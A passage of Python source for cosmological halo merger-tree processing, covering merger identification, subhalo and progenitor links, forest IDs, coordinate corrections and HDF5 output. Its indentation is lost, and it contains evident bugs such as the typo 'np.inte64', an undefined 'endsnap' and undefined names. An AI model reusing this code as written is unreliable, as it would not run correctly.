start=time.clock()
if (iverbose):print("Processing ", len(hids))
if (len(hids)==0):continue
for hidval in hids:
#now for each object get the main progenitor
haloid=np.uint64(hidval)
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
halosnap=j
originalhaloid=haloid
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
numprog=tree[halosnap]["Num_progen"][haloindex]
#if object has no progenitor set LastMergerRatio to 0 and LastMerger to 0
if (numprog==0):
halodata[halosnap]["LastMerger"][haloindex]=0
halodata[halosnap]["LastMergerRatio"][haloindex]=0
continue
#print "starting halos ",j, hidval
#halo has main branch which we can wander on
#while object is not its own progenitor move along tree to see how many major mergers it had across its history
while (True):
#now for each progenitor, lets find any nearby objects within a given mass/vmax interval
posval=[halodata[progsnap]["Xc"][progindex],halodata[progsnap]["Yc"][progindex],halodata[progsnap]["Zc"][progindex]]
radval=RADINFAC*halodata[progsnap]["R_200crit"][progindex]
#get neighbour list within RADINFAC sorted by mass with most massive first
NNlist=pos_tree[progsnap].query_ball_point(posval, radval)
NNlist=[NNlist[ij] for ij in np.argsort(halodata[progsnap]["Mass_tot"][NNlist])[::-1]]
#store boxval for periodic correction
boxval=boxsize*atime[progsnap]/hval
#now if list contains some objects, lets see if the velocity vectors are moving towards each other and mass/vmax ratios are okay
if (len(NNlist)>0):
for NN in NNlist:
if (NN!=progindex):
mratio=halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex]
vratio=halodata[progsnap]["Vmax"][NN]/halodata[progsnap]["Vmax"][progindex]
#merger ratio is for object being larger of the two involved in merger
if (mratio>MERGERMLIM and mratio<1.0):
posvalrel=[halodata[progsnap]["Xc"][progindex]-halodata[progsnap]["Xc"][NN],halodata[progsnap]["Yc"][progindex]-halodata[progsnap]["Yc"][NN],halodata[progsnap]["Zc"][progindex]-halodata[progsnap]["Zc"][NN]]
for ij in range(3):
if posvalrel[ij]<-0.5*boxval: posvalrel[ij]+=boxval
elif posvalrel[ij]>0.5*boxval: posvalrel[ij]-=boxval
velvalrel=[halodata[progsnap]["VXc"][progindex]-halodata[progsnap]["VXc"][NN],halodata[progsnap]["VYc"][progindex]-halodata[progsnap]["VYc"][NN],halodata[progsnap]["VZc"][progindex]-halodata[progsnap]["VZc"][NN]]
radvelval=np.dot(posvalrel,velvalrel)/np.linalg.norm(posvalrel)
if (radvelval<0):
#merger is happending
#print "merger happening ", progsnap, NN
#question of whether should move down the tree till merger no longer happening and define that as the start
#this could also set the length of the merger
#lets move along the tree of the infalling neighbour still it object is past the some factor of progenitor virial radius
starthaloindex=progindex
starthaloid=progid
starthalosnap=progsnap
startmergerindex=NN
startmergerid=halodata[progsnap]["ID"][NN]
startmergersnap=progsnap
mergerstartindex=starthaloindex
mergerstartid=starthaloid
mergerstartsnap=starthalosnap
while (tree[starthalosnap]["Num_progen"][starthaloindex]>0 and tree[startmergersnap]["Num_progen"][startmergerindex]>0):
posvalrel=[halodata[starthalosnap]["Xc"][starthaloindex]-halodata[startmergersnap]["Xc"][startmergerindex],halodata[starthalosnap]["Yc"][starthaloindex]-halodata[startmergersnap]["Yc"][startmergerindex],halodata[starthalosnap]["Zc"][starthaloindex]-halodata[startmergersnap]["Zc"][startmergerindex]]
boxval=boxsize*atime[starthalosnap]/hval
for ij in range(3):
if posvalrel[ij]<-0.5*boxval: posvalrel[ij]+=boxval
elif posvalrel[ij]>0.5*boxval: posvalrel[ij]-=boxval
radval=np.linalg.norm(posvalrel)/halodata[starthalosnap]["R_200crit"][starthaloindex]
mratio=halodata[startmergersnap]["Mass_tot"][startmergerindex]/halodata[starthalosnap]["Mass_tot"][starthaloindex]
#as moving back if halo now outside or too small, stop search and define this as start of merger
if (radval>RADOUTFAC or mratio<MERGERMLIM):
mergerstartindex=starthaloindex
mergerstartid=starthaloid
mergerstartsnap=starthalosnap
break
#move to next progenitors
nextidval=halodata[starthalosnap]["Tail"][starthaloindex]
nextsnapval=halodata[starthalosnap]["TailSnap"][starthaloindex]
nextindexval=int(nextidval%TEMPORALHALOIDVAL-1)
starthaloid=nextidval
starthalosnap=nextsnapval
starthaloindex=nextindexval
nextidval=halodata[startmergersnap]["Tail"][startmergerindex]
nextsnapval=halodata[startmergersnap]["TailSnap"][startmergerindex]
nextindexval=int(nextidval%TEMPORALHALOIDVAL-1)
startmergerid=nextidval
startmergersnap=nextsnapval
startmergerindex=nextindexval
#store timescale of merger
deltamergertime=(mergerstartsnap-progsnap)
#set this as the merger for all halos from this point onwards till reach head or halo with non-zero merger
merginghaloindex=mergerstartindex
merginghaloid=mergerstartid
merginghalosnap=mergerstartsnap
oldmerginghaloid=merginghaloid
#print "Merger found ",progsnap,mergerstartsnap, halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex],
#print halodata[startmergersnap]["Mass_tot"][startmergerindex]/halodata[starthalosnap]["Mass_tot"][starthaloindex]
#now set merger time for all later haloes unless an new merger has happened
while (oldmerginghaloid!=halodata[progsnap]["RootHead"][progindex] and halodata[merginghalosnap]["LastMergerRatio"][merginghaloindex]<0):
halodata[merginghalosnap]["LastMerger"][merginghaloindex]=halodata[progsnap]["ID"][NN]
halodata[merginghalosnap]["LastMergerRatio"][merginghaloindex]=halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex]
halodata[merginghalosnap]["LastMergerSnap"][merginghaloindex]=progsnap
halodata[merginghalosnap]["LastMergerDeltaSnap"][merginghaloindex]=deltamergertime
oldmerginghaloid=merginghaloid
mergingnextid=halodata[merginghalosnap]["Head"][merginghaloindex]
mergingnextsnap=halodata[merginghalosnap]["HeadSnap"][merginghaloindex]
mergingnextindex=int(mergingnextid%TEMPORALHALOIDVAL-1)
merginghaloindex=mergingnextindex
merginghaloid=mergingnextid
merginghalosnap=mergingnextsnap
#move to next step
if (haloid==progid):
oldhaloid=haloid
currentsnap=halosnap
currentindex=haloindex
currentid=haloid
while (oldhaloid!=halodata[progsnap]["RootHead"][progindex] and halodata[currentsnap]["LastMergerRatio"][currentindex]<0):
halodata[currentsnap]["LastMerger"][currentindex]=0
halodata[currentsnap]["LastMergerRatio"][currentindex]=0
nextid=halodata[currentsnap]["Head"][currentindex]
nextsnap=halodata[currentsnap]["HeadSnap"][currentindex]
nextindex=int(nextid%TEMPORALHALOIDVAL-1)
oldhaloid=currentid
currentsnap=nextsnap
currentid=nextid
currentindex=nextindex
break
haloid=progid
haloindex=progindex
halosnap=progsnap
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
numprog=tree[halosnap]["Num_progen"][haloindex]
#if at end of line then move up and set last major merger to 0
if (iverbose): print("Done snap",j,time.clock()-start)
def generate_sublinks(numhalos,halodata):
"""
generate sublinks for specific time slice
"""
if (numhalos==0):
return
halos=np.where(halodata['hostHaloID']==-1)[0]
for ihalo in halos:
haloid=halodata['ID'][ihalo]
halodata['PreviousSubhalo'][ihalo]=haloid
w=np.where((halodata["hostHaloID"]==haloid))[0]
if (len(w)>0):
halodata['NextSubhalo'][ihalo]=halodata['ID'][w[0]]
halodata['PreviousSubhalo'][w[0]]=halodata['ID'][w[0]]
for isub in range(len(w)-1):
subid=halodata['ID'][w[isub]]
nextsubid=halodata['ID'][w[isub+1]]
halodata['NextSubhalo'][w[isub]]=nextsubid
halodata['PreviousSubhalo'][w[isub+1]]=subid
halodata['NextSubhalo'][w[-1]]=halodata['ID'][w[-1]]
else:
halodata['NextSubhalo'][ihalo]=haloid
def GenerateSubhaloLinks(numsnaps,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, iverbose=0, iparallel=0):
"""
This code generates a quick way of moving across a halo's subhalo list
The code is passed
- the number of snapshots,
- an array of the number of haloes per snapshot,
- the halodata dictionary structure which must contain the halo merger tree based keys, Head, RootHead, etc, and mass, phase-space positions of haloes,
and other desired properties
"""
for j in range(numsnaps):
#store id and snap and mass of last major merger and while we're at it, store number of major mergers
halodata[j]["NextSubhalo"]=np.zeros(numhalos[j],dtype=np.int64)
halodata[j]["PreviousSubhalo"]=np.zeros(numhalos[j],dtype=np.int64)
#iterate over all host halos and set their subhalo links
start=time.clock()
nthreads=1
if (iparallel):
manager=mp.Manager()
nthreads=int(min(mp.cpu_count(),numsnaps))
print("Number of threads is ",nthreads)
for j in range(0,numsnaps,nthreads):
start2=time.clock()
if (iparallel):
activenthreads=nthreads
if (numsnaps-1-j<activenthreads): activenthreads=numsnaps-1-j
processes=[mp.Process(target=generate_sublinks,args=(numhalos[j+k],halodata[j+k])) for k in range(activenthreads)]
for p in processes:
p.start()
for p in processes:
p.join()
if (iverbose): print("Done snaps",j,"to",j+nthreads,time.clock()-start2)
else:
generate_sublinks(numhalos[j],halodata[j])
if (iverbose): print("Done snap",j,time.clock()-start2)
print("Done subhalolinks ",time.clock()-start)
def GenerateProgenitorLinks(numsnaps,numhalos,halodata,nsnapsearch=4,TEMPORALHALOIDVAL=1000000000000, iverbose=1):
"""
This code generates a quick way of moving across a halo's progenitor list storing a the next/previous progenitor
The code is passed
- the number of snapshots,
- an array of the number of haloes per snapshot,
- the halodata dictionary structure which must contain the halo merger tree based keys, Head, RootHead, etc, and mass, phase-space positions of haloes,
and other desired properties
"""
if (nsnapsearch>=numsnaps-1):
nsnapsearch=numsnaps-1
print("Warning, number of snaps < search size, reducing search size to numsnaps-1=",nsnapsearch)
for j in range(numsnaps):
#store id and snap and mass of last major merger and while we're at it, store number of major mergers
halodata[j]["NextProgenitor"]=np.ones(numhalos[j],dtype=np.int64)*-1
halodata[j]["PreviousProgenitor"]=np.ones(numhalos[j],dtype=np.int64)*-1
#move backward in time and identify all unique heads
start=time.clock()
for j in range(1,numsnaps):
start2=time.clock()
if (numhalos[j]==0): continue
#find all unique heads
heads=np.unique(np.array(np.int64(halodata[j]['Head'])))
#for these heads identify all halos with this head
for ihead in heads:
currenttails=deque()
for k in range(j,j+nsnapsearch):
w=np.where(halodata[k]['Head']==ihead)
if (len(w[0])>0):
currenttails.extend(np.nditer(np.int64(halodata[k]["ID"][w])))
if (len(currenttails)==0):
continue
haloid=currenttails[0]
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
halosnap=numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL
halodata[halosnap]['PreviousProgenitor'][haloindex]=np.int64(haloid)
for itail in range(len(currenttails)-1):
haloid=currenttails[itail]
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
halosnap=np.inte64(numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
haloindex=int(currenttails[itail]%TEMPORALHALOIDVAL-1)
nexthaloid=currenttails[itail+1]
nexthaloindex=int(nexthaloid%TEMPORALHALOIDVAL-1)
nexthalosnap=np.int64(numsnaps-1-(nexthaloid-int(nexthaloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
halodata[halosnap]['NextProgenitor'][haloindex]=np.int64(nexthaloid)
halodata[nexthalosnap]['PreviousProgenitor'][nexthaloindex]=np.int64(haloid)
haloid=currenttails[-1]
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
halosnap=numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL
halodata[halosnap]['NextProgenitor'][haloindex]=haloid
if (iverbose): print("Done snap",j,time.clock()-start2)
print("Done progenitor links ",time.clock()-start)
def SetForestID(numsnaps,halodata,rootheadid,ForestID,AllRootHead,
TEMPORALHALOIDVAL = 1000000000000,searchSnapLim = 5, ireversesnaporder=True):
"""
Sets the forest id of halos using a roothead as a start point.
Given an initial root head and end snapshot,
First append the roothead to the AllRootHead list.
search all previous snapshots for any haloes that share the same roothead.
Also at each snapshot, find all subhaloes of all haloes sharing the same
root head
if the roothead of a subhalo is not present in the AllRootHead list
then recursively call SetForestID with this subhalo's root head as start point
if a subhalo's current host is not within the tree defined by rootheadid
then recursively call SetForestID with this host's root head as start point
Parameters
----------
numsnaps : numpy.int32
the number of snapshots
halodata : dict
the halodata dictionary structure which must contain the halo merger tree based keys (Head, RootHead), etc.
rootheadid : numpy.int64
the rootheadid of the tree that will be explored and have its forestID set
AllRootHead : list
a list that stores the current set of rootheadid values that have been searched
Optional Parameters
-------------------
TEMPORALHALOIDVAL : numpy.int64
Temporal ID value that makes Halo IDs temporally unique, adding a snapshot num* this value.
Allows one to quickly parse a Halo ID to determine the snapshot it exists at and its index.
searchSnapLim : numpy.int32
Maximum number of snapshots to keep searching if no new halos are identified as beloning to
a rootheadid's tree, moving backwards in time
ireversesnaporder : bool
Whether dictionary data has late times starting at 0 (True, default) or at end of dictionary (False)
Returns
-------
AllRootHead : list
Updated list
halodata : dict
Updated halo data
"""
if (ireversesnaporder): endSnap = numsnaps-int(rootheadid/TEMPORALHALOIDVAL)-1
else : endSnap = int(rootheadid/TEMPORALHALOIDVAL)
rootheadindex=int(rootheadid%TEMPORALHALOIDVAL-1)
AllRootHead.append(rootheadid)
#set the forest level of this searcheed
#if this object is a host at final snap then set the forest level to 0
#otherwise set the ForestLevel to 1
ForestLevel=1*(halodata[endSnap]["hostHaloID"][rootheadindex]!=-1)
#Indicator for amount of snapshots searcheed
iSearchSnap = 0
#set the direction of how the data will be processed
if (ireversesnaporder): snaplist=np.arange(endSnap,numsnaps,dtype=np.int32)
else : snaplist=np.arange(endsnap,-1,-1)
for snap in snaplist:
#Find which halos at this snapshot point to the RootDescedant
sel = np.where(halodata[snap]["RootHead"]==rootheadid)[0]
#keep track of how many snapshots there have been where there is nothing in the tree
if(sel.size==0):
iSearchSnap+=1
if(iSearchSnap==searchSnapLim): break
else: iSearchSnap = 0
# Set all the halos within this tree within this snapshot to this forest ID
halodata[snap]["ForestID"][sel] = ForestID
halodata[snap]["ForestLevel"][sel] = ForestLevel
#Lets find which halos are subhalos of the halos within the tree defined by
#halos with the same rootheadid
subHaloIndxs = np.where(np.in1d(halodata[snap]["hostHaloID"],halodata[snap]["ID"][sel]))[0]
#Lets loop over all the subhalos within this selection, which contains
#all subhalos of any host halos within the tree defined by rootheadid
for subHaloIndx in subHaloIndxs:
#See if this tree has already been set
if(halodata[snap]["RootHead"][subHaloIndx] not in AllRootHead):
#Lets walk the subhalo's tree setting the forest ID
AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[snap]["RootHead"][subHaloIndx],ForestID,AllRootHead)
#Extract the hosts of all subhalos in this selection that are not already in the tree defined by rootheadid
treeSubhaloSel = (halodata[snap]["hostHaloID"][sel]!=-1) & (np.invert(np.in1d(halodata[snap]["hostHaloID"][sel],halodata[snap]["ID"][sel])))
#Get the index of these hosts that lie outside the tree
hostIndxs = np.unique(halodata[snap]["hostHaloID"][sel][treeSubhaloSel]%TEMPORALHALOIDVAL-1).astype(int)
#Loop over all the index for the host halos
for hostIndx in hostIndxs:
#See if this tree has already been set
if(halodata[snap]["RootHead"][hostIndx] not in AllRootHead):
#Lets walk the hosts tree setting the forrest ID
AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[snap]["RootHead"][hostIndx],ForestID,AllRootHead)
return AllRootHead,halodata
def GenerateForest(numsnaps,numhalos,halodata,atime,
TEMPORALHALOIDVAL=1000000000000, iverbose=1, interactiontime=2, ispatialintflag=False, pos_tree=[], cosmo=dict()):
"""
This code traces all root heads back in time identifying all interacting haloes and bundles them together into the same forest id
The idea is to have in the halodata dictionary an associated unique forest id for all related (sub)haloes. The code also allows
for some cleaning of the forest, specifically if a (sub)halo is only interacting for some small fraction of time, then it is not
assigned to the forest. This can limit the size of a forest, which could otherwise become the entire halo catalog.
Parameters
----------
numsnaps : numpy.int32
the number of snapshots
numhalos : array
array of the number of haloes per snapshot.
halodata : dict
the halodata dictionary structure which must contain the halo merger tree based keys (Head, RootHead), etc.
atime : array
an array of scale factors
Optional Parameters
-------------------
TEMPORALHALOIDVAL : numpy.int64
Temporal ID value that makes Halo IDs temporally unique, adding a snapshot num* this value.
Allows one to quickly parse a Halo ID to determine the snapshot it exists at and its index.
iverbose : int
verbosity of function (0, minimal, 1, verbose, 2 chatterbox)
interactiontime : int
Optional functionality not implemented yet. Allows forest to be split if connections do not span
more than this number of snapshots
ispatialintflag : bool
Flag indicating whether spatial information should be used to join forests. This requires cosmological information
pos_tree : scikit.spatial.cKDTree
Optional functionality not implemented yet. Allows forests to be joined if haloes
are spatially close.
cosmo : dict
dictionary which has cosmological information such as box size, hval, Omega_m
Returns
-------
ForestSize : numpy.array
Update the halodata dictionary with ForestID information and also returns the size of
the forests
"""
#initialize the dictionaries
for j in range(numsnaps):
#store id and snap and mass of last major merger and while we're at it, store number of major mergers
halodata[j]["ForestID"]=np.ones(numhalos[j],dtype=np.int64)*-1
halodata[j]["ForestLevel"]=np.ones(numhalos[j],dtype=np.int32)*-1
#built KD tree to quickly search for near neighbours. only build if not passed.
if (ispatialintflag):
start=time.clock()
boxsize=cosmo['BoxSize']
hval=cosmo['Hubble_param']
if (len(pos_tree)==0):
pos=[[]for j in range(numsnaps)]
pos_tree=[[]for j in range(numsnaps)]
start=time.clock()
if (iverbose): print("KD tree build")
for j in range(numsnaps):
if (numhalos[j]>0):
boxval=boxsize*atime[j]/hval
pos[j]=np.transpose(np.asarray([halodata[j]["Xc"],halodata[j]["Yc"],halodata[j]["Zc"]]))
pos_tree[j]=spatial.cKDTree(pos[j],boxsize=boxval)
if (iverbose): print("done ",time.clock()-start)
#now start marching backwards in time from root heads
#identifying all subhaloes that have every been subhaloes for long enough
#and all progenitors and group them together into the same forest id
forestidval=1
start=time.clock()
for j in range(numsnaps):
start2=time.clock()
if (numhalos[j]==0): continue
#now with tree start at last snapshot and identify all root heads
#only look at halos that are their own root head and are not subhalos
rootheads=np.where((halodata[j]['ID']==halodata[j]['RootHead'])*(halodata[j]['hostHaloID']==-1)*(halodata[j]['ForestID']==-1))
if (iverbose): print("At snapshot",j,len(rootheads[0]))
for iroothead in rootheads[0]:
#if a halo has been processed as part of a forest as a
#result of walking the subhalo branches of a different root head
#then move on to the next object
if (halodata[j]['ForestID'][iroothead]!=-1): continue
AllRootHead = []
#begin recursively searching and setting the forest using the the roothead
AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[j]["RootHead"][iroothead],forestidval,AllRootHead)
#update forest id
forestidval+=1
if (iverbose): print("Done snap",j,time.clock()-start2)
#get the size of each forest
ForestSize=np.zeros(forestidval,dtype=int64)
for j in range(numsnaps):
if (numhalos[j]==0): continue
uniqueforest,counts=np.unique(halodata[j]['ForestID'],return_counts=True)
for icount in range(len(uniqueforest)):
ForestSize[uniqueforest[icount]-1]+=counts[icount]
if (iverbose): print("Finished processing forest size for snap",j)
start2=time.clock()
#first identify all subhalos and see if any have subhalo connections with different than their host
for j in range(numsnaps):
if (numhalos[j]==0): continue
#now with tree start at last snapshot and identify all root heads
#only look at halos that are their own root head and are not subhalos
missingforest=np.where((halodata[j]['ForestID']==-1))
rootheads=np.where((halodata[j]['ID']==halodata[j]['RootHead'])*(halodata[j]['ForestID']==-1))
subrootheads=np.where((halodata[j]['ForestID']==-1)*(halodata[j]['hostHaloID']!=-1))
if (iverbose): print("At snapshot",j," still have ",halodata[j]['ForestID'].size,len(missingforest[0]), " with no forest id ! Of which ",len(rootheads[0])," are root heads", len(subrootheads[0]),"are subhalos")
#if (iverbose and len(missingforest[0])>0): print("At snapshot",j," still have ",len(missingforest[0]), " with no forest id ! Of which ",len(rootheads[0])," are root heads", len(subrootheads[0]),"are subhalos")
if (len(subrootheads[0])>0):
for isub in subrootheads[0]:
hostid=halodata[j]['hostHaloID'][isub]
hostindex=int(hostid%TEMPORALHALOIDVAL-1)
halodata[j]['ForestID'][isub]=halodata[j]['ForestID'][hostindex]
halodata[j]['ForestLevel'][isub]=halodata[j]['ForestLevel'][hostindex]+1
#then return this
print("Done generating forest",time.clock()-start)
return ForestSize
"""
Adjust halo catalog for period, comoving coords, etc
"""
def AdjustforPeriod(numsnaps,numhalos,boxsize,hval,atime,halodata,icomove=0):
"""
Map halo positions from 0 to box size
"""
for i in range(numsnaps):
if (icomove):
boxval=boxsize/hval
else:
boxval=boxsize*atime[i]/hval
wdata=np.where(halodata[i]["Xc"]<0)
halodata[i]["Xc"][wdata]+=boxval
wdata=np.where(halodata[i]["Yc"]<0)
halodata[i]["Yc"][wdata]+=boxval
wdata=np.where(halodata[i]["Zc"]<0)
halodata[i]["Zc"][wdata]+=boxval
wdata=np.where(halodata[i]["Xc"]>boxval)
halodata[i]["Xc"][wdata]-=boxval
wdata=np.where(halodata[i]["Yc"]>boxval)
halodata[i]["Yc"][wdata]-=boxval
wdata=np.where(halodata[i]["Zc"]>boxval)
halodata[i]["Zc"][wdata]-=boxval
def AdjustComove(itocomovefromphysnumsnaps,numsnaps,numhalos,atime,halodata,igas=0,istar=0):
"""
Convert distances to/from physical from/to comoving
"""
for i in range(numsnaps):
if (numhalos[i]==0): continue
#converting from physical to comoving
if (itocomovefromphysnumsnaps==1):
fac=float(1.0/atime[i])
#converting from comoving to physical
else:
fac=float(atime[i])
if (fac==1): continue
#convert physical distances
halodata[i]["Xc"]*=fac
halodata[i]["Yc"]*=fac
halodata[i]["Zc"]*=fac
halodata[i]["Xcmbp"]*=fac
halodata[i]["Ycmbp"]*=fac
halodata[i]["Zcmbp"]*=fac
#sizes
halodata[i]["Rvir"]*=fac
halodata[i]["R_size"]*=fac
halodata[i]["R_200mean"]*=fac
halodata[i]["R_200crit"]*=fac
halodata[i]["R_BN97"]*=fac
halodata[i]["Rmax"]*=fac
halodata[i]["R_HalfMass"]*=fac
#if gas
if (igas):
halodata[i]["Xc_gas"]*=fac
halodata[i]["Yc_gas"]*=fac
halodata[i]["Zc_gas"]*=fac
halodata[i]["R_HalfMass_gas"]*=fac
#if stars
if (istar):
halodata[i]["Xc_star"]*=fac
halodata[i]["Yc_star"]*=fac
halodata[i]["Zc_star"]*=fac
halodata[i]["R_HalfMass_star"]*=fac
"""
Code to use individual snapshot files and merge them together into a full unified hdf file containing information determined from the tree
"""
def ProduceUnifiedTreeandHaloCatalog(fname,numsnaps,tree,numhalos,halodata,atime,
descripdata={'Title':'Tree and Halo catalog of sim', 'VELOCIraptor_version':1.15, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
cosmodata={'Omega_m':1.0, 'Omega_b':0., 'Omega_Lambda':0., 'Hubble_param':1.0,'BoxSize':1.0, 'Sigma8':1.0},
unitdata={'UnitLength_in_Mpc':1.0, 'UnitVelocity_in_kms':1.0,'UnitMass_in_Msol':1.0, 'Flag_physical_comoving':True,'Flag_hubble_flow':False},
partdata={'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
ibuildheadtail=0, icombinefile=1):
"""
produces a unifed HDF5 formatted file containing the full catalog plus information to walk the tree
\ref BuildTemporalHeadTail must have been called before otherwise it is called.
Code produces a file for each snapshot
The keys are the same as that contained in the halo catalog dictionary with the addition of
Num_of_snaps, and similar header info contain in the VELOCIraptor hdf files, ie Num_of_groups, Total_num_of_groups
\todo don't know if I should use multiprocessing here to write files in parallel. IO might not be ideal
"""
if (ibuildheadtail==1):
BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata)
totnumhalos=sum(numhalos)
if (icombinefile==1):
hdffile=h5py.File(fname+".snap.hdf.data",'w')
headergrp=hdffile.create_group("Header")
#store useful information such as number of snapshots, halos,
#cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
#units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
#and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
#set the attributes of the header
headergrp.attrs["NSnaps"]=numsnaps
#overall description
#simulation box size
#cosmological params
cosmogrp=headergrp.create_group("Cosmology")
for key in cosmodata.keys():
cosmogrp.attrs[key]=cosmodata[key]
#unit params
unitgrp=headergrp.create_group("Units")
for key in unitdata.keys():
unitgrp.attrs[key]=unitdata[key]
#particle types
partgrp=headergrp.create_group("Parttypes")
partgrp.attrs["Flag_gas"]=descripdata["Flag_gas"]
partgrp.attrs["Flag_star"]=descripdata["Flag_star"]
partgrp.attrs["Flag_bh"]=descripdata["Flag_bh"]
for i in range(numsnaps):
snapgrp=hdffile.create_group("Snap_%03d"%(numsnaps-1-i))
snapgrp.attrs["Snapnum"]=(numsnaps-1-i)
snapgrp.attrs["NHalos"]=numhalos[i]
snapgrp.attrs["scalefactor"]=atime[i]
for key in halodata[i].keys():
snapgrp.create_dataset(key,data=halodata[i][key])
hdffile.close()
else:
for i in range(numsnaps):
hdffile=h5py.File(fname+".snap_%03d.hdf.data"%(numsnaps-1-i),'w')
hdffile.create_dataset("Snap_value",data=np.array([numsnaps-1-i],dtype=np.uint32))
hdffile.create_dataset("NSnaps",data=np.array([numsnaps],dtype=np.uint32))
hdffile.create_dataset("NHalos",data=np.array([numhalos[i]],dtype=np.uint64))
hdffile.create_dataset("TotalNHalos",data=np.array([totnumhalos],dtype=np.uint64))
hdffile.create_dataset("scalefactor",data=np.array([atime[i]],dtype=np.float64))
for key in halodata[i].keys():
hdffile.create_dataset(key,data=halodata[i][key])
hdffile.close()
hdffile=h5py.File(fname+".tree.hdf.data",'w')
hdffile.create_dataset("NSnaps",data=np.array([numsnaps],dtype=np.uint32))
hdffile.create_dataset("TotalNHalos",data=np.array([totnumhalos],dtype=np.uint64))
hdffile.create_dataset("NHalos",data=np.array([numhalos],dtype=np.uint64))
for i in range(numsnaps):
snapgrp=hdffile.create_group("Snap_%03d"%(numsnaps-1-i))
for key in tree[i].keys():
"""
#to be completed for progenitor list
if (key=="Progen"):
for j in range(numhalos[i]):
halogrp=snapgrp.create_group("Halo"+str(j))
halogrp.create_dataset(key,data=tree[i][key][j])
else:
snapgrp.create_dataset(key,data=tree[i][key])
"""
if ((key=="Progen") | (key=="Descen")): continue
snapgrp.create_dataset(key,data=tree[i][key])
hdffile.close()
def ProduceCombinedUnifiedTreeandHaloCatalog(fname,numsnaps,tree,numhalos,halodata,atime,
descripdata={'Title':'Tree and Halo catalog of sim', 'VELOCIraptor_version':1.15, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
cosmodata={'Omega_m':1.0, 'Omega_b':0., 'Omega_Lambda':0., 'Hubble_param':1.0,'BoxSize':1.0, 'Sigma8':1.0},
unitdata={'UnitLength_in_Mpc':1.0, 'UnitVelocity_in_kms':1.0,'UnitMass_in_Msol':1.0, 'Flag_physical_comoving':True,'Flag_hubble_flow':False},
partdata={'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
ibuildheadtail=0,ibuildmajormergers=0, TEMPORALHALOIDVAL=1000000000000):
"""
produces a unifed HDF5 formatted file containing the full catalog plus information to walk the tree
#ref BuildTemporalHeadTail must have been called before otherwise it is called.
Code produces a file for each snapshot
The keys are the same as that contained in the halo catalog dictionary with the addition of
Num_of_snaps, and similar header info contain in the VELOCIraptor hdf files, ie Num_of_groups, Total_num_of_groups
#todo don't know if I should use multiprocessing here to write files in parallel. IO might not be ideal
Here the halodata is the dictionary contains the information
"""
if (ibuildheadtail==1):
BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata)
if (ibuildmajormergers==1):
IdentifyMergers(numsnaps,tree,numhalos,halodata,boxsize,hval,atime)
hdffile=h5py.File(fname+".snap.hdf.data",'w')
headergrp=hdffile.create_group("Header")
#store useful information such as number of snapshots, halos,
#cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
#units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
#and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
#set the attributes of the header
headergrp.attrs["NSnaps"]=numsnaps
#overall description
headergrp.attrs["Title"]=descripdata["Title"]
#simulation box size
headergrp.attrs["BoxSize"]=cosmodata["BoxSize"]
findergrp=headergrp.create_group("HaloFinder")
findergrp.attrs["Name"]="VELOCIraptor"
findergrp.attrs["Version"]=descripdata["VELOCIraptor_version"]
findergrp.attrs["Particle_num_threshold"]=descripdata["Particle_num_threshold"]
treebuildergrp=headergrp.create_group("TreeBuilder")
treebuildergrp.attrs["Name"]="VELOCIraptor-Tree"
treebuildergrp.attrs["Version"]=descripdata["Tree_version"]
treebuildergrp.attrs["Temporal_linking_length"]=descripdata["Temporal_linking_length"]
#cosmological params
cosmogrp=headergrp.create_group("Cosmology")
for key in cosmodata.keys():
if (key!='BoxSize'): cosmogrp.attrs[key]=cosmodata[key]
#unit params
unitgrp=headergrp.create_group("Units")
for key in unitdata.keys():
unitgrp.attrs[key]=unitdata[key]
#particle types
partgrp=headergrp.create_group("Parttypes")
partgrp.attrs["Flag_gas"]=descripdata["Flag_gas"]
partgrp.attrs["Flag_star"]=descripdata["Flag_star"]
partgrp.attrs["Flag_bh"]=descripdata["Flag_bh"]
#now have finished with header
#now need to create groups for halos and then a group containing tree information
snapsgrp=hdffile.create_group("Snapshots")
#internal tree keys
treekeys=["RootHead", "RootHeadSnap", "Head", "HeadSnap", "Tail", "TailSnap", "RootTail", "RootTailSnap", "Num_progen"]
for i in range(numsnaps):
#note that I normally have information in reverse order so that might be something in the units
snapgrp=snapsgrp.create_group("Snap_%03d"%(numsnaps-1-i))
snapgrp.attrs["Snapnum"]=i
snapgrp.attrs["NHalos"]=numhalos[i]
snapgrp.attrs["scalefactor"]=atime[i]
